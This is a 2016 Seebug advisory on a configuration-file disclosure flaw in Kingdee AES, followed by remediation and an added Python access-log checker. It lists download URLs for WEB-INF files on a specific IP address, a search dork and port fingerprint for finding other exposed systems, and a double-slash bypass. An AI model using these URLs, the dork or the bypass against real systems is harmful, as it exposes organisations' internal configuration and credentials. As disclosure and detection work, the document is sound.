Kingdee AES System Java Web Configuration File Sensitive Information Disclosure Vulnerability

2016-03-10T00:00:00
ID SSV:90979
Type seebug
Reporter hhxx
Modified 2016-03-10T00:00:00

Description

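0x01 Affected Framework

Kingdee Software, founded in 1993, is a vendor of enterprise management software such as ERP and financial software. It operates Internet business applications including its official site (kingdee.com), Youshang (youshang.com), Kuaidi100 (kuaidi100.com), and Yunzhijia (kdweibo.com).

Official homepage: www.kingdee.com

Customer cases:

0x02 Exploitation

The Java web configuration files of the Kingdee AES system can be downloaded arbitrarily.

Configuration files under portal: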

http://58.63.253.42/portal/WEB-INF/web.xml

http://58.63.253.42/portal/WEB-INF/config/pluto/pluto-portal-driver-services-config.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-basic.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-datasource.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-frame.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-pub.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-perm.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-setting.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-page.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-personal.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-portlet.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-weibo.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-report.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-sms.xml

http://58.63.253.42/portal/WEB-INF/sso/applicationContext-ssoClient.xml

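Configuration files under eassso:

Search keyword: inurl:/eassso/

This finds systems of the same type. The following addresses were manually verified to be vulnerable (the system often listens on port 6888, which can be used as a feature to locate it). If the download fails with a single slash, try a double slash: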

http://58.63.253.42/eassso//WEB-INF/web.xml

http://58.63.253.42/eassso//WEB-INF/applicationContext.xml

http://58.63.253.42/easssoWEB-INF/deployerConfigContext.xml

Reading the data source configuration .../portal/WEB-INF/config/spring/applicationContext-datasource.xml yields:

```xml
<beans default-lazy-init="true" default-autowire="no" default-dependency-check="none">

  <bean id="dataSource" class="com.kingdee.portal.biz.core.datacenter.KDPortalDataSource">
    <property name="dataSource">
      <ref bean="MZROS" />
    </property>
  </bean>

  <bean id="MZROS" class="org.springframework.jndi.JndiObjectFactoryBean">
    <property name="jndiName" value="jdbc/MZROS" />
  </bean>

</beans>
```

0x03 Remediation

Prohibit access through the web.
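
To verify the remediation on your own deployment, the following added example (not part of the original advisory or of Kingdee's code) normalizes request paths so that the double-slash form described above is treated the same as the single-slash form, then flags access-log entries where a WEB-INF or META-INF file was actually served. It assumes a combined-format access log; the function names and the sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

PROTECTED = {"web-inf", "meta-inf"}  # directories a servlet container must never serve
# Request target and status from a combined-format access log line (assumed format)
LOG_RE = re.compile(r'"(?:GET|HEAD|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')

def normalize(target: str) -> str:
    """Decode the request path, collapse repeated slashes, resolve dot segments."""
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    path = re.sub(r"/{2,}", "/", path)
    return posixpath.normpath(path)

def is_protected(target: str) -> bool:
    """True if any path segment is WEB-INF or META-INF, compared case-insensitively."""
    return any(seg in PROTECTED for seg in normalize(target).lower().split("/"))

def exposed_hits(log_lines):
    """Return (normalized path, status) for protected paths answered with 2xx."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and m["status"].startswith("2") and is_protected(m["target"]):
            hits.append((normalize(m["target"]), int(m["status"])))
    return hits

# Constructed sample log lines (documentation address range), not taken from the advisory
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2016:10:00:01 +0800] "GET /portal/index.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Mar/2016:10:00:02 +0800] "GET /portal/WEB-INF/web.xml HTTP/1.1" 404 312',
    '203.0.113.7 - - [10/Mar/2016:10:00:03 +0800] "GET /portal//WEB-INF/web.xml HTTP/1.1" 200 8841',
    '203.0.113.7 - - [10/Mar/2016:10:00:04 +0800] "GET /eassso//WEB-INF/applicationContext.xml HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for path, status in exposed_hits(SAMPLE_LOG):
        print(f"served protected file: {path} ({status})")
```

The same `is_protected` check can back a deny rule in a front-end filter, so that a request is rejected on its normalized path rather than on the raw string.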